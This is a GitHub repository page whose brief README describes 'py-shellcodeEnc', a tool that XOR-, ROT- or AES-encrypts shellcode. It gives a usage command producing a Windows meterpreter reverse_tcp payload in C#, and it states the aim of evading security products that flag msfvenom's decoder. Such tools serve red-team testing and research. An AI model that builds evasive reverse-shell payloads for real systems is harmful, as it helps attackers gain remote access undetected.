Skip to content

0xm4ud/py-shellcodeEnc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 

Repository files navigation

py-shellcodeEnc

tool to encrypt(xor,rot,aes) shellcode

USAGE:

python senc.py -p windows/meterpreter/reverse_tcp -lhost eth0 -lport 443 -e rot -k 254 -f csharp

TODO - print cssharp decrypt function.

This is mainly for: Avoiding getting flagged because of msfvenom meterpreter encoded builtin decoder which is a red flag for any security solution.

1 - using with a shellcode runner with decryption routine implemented.

2 - DEP with ROP decode and etc..

About

little utility to encrypt(xor,aes,rot) shellcode

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages